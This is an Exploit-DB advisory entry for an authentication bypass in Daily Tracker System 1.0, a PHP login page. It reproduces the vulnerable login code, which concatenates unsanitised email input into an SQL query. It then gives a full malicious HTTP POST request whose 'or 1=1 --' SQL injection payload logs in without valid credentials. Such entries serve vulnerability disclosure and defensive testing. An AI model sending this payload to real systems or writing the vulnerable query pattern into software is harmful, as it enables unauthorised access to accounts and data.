Daily Tracker System 1.0 - Authentication Bypass

EDB-ID:

48787

CVE:

N/A




Platform:

PHP

Date:

2020-09-03


# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: CVE-2020-24193
# Date: September 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4

# Vulnerable Source Code

if(isset($_POST['login']))
{
$email=$_POST['email'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"select ID from tbluser where  Email='$email' && Password='$password    ' ");
$ret=mysqli_fetch_array($query);
if($ret>0){
 $_SESSION['detsuid']=$ret['ID'];
 header('location:dashboard.php');
}
 else{
 $msg="Invalid Details.";
 }
}
?>


# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1

email='+or+1%3d1+--+hyd3sec&password=badPass&login=login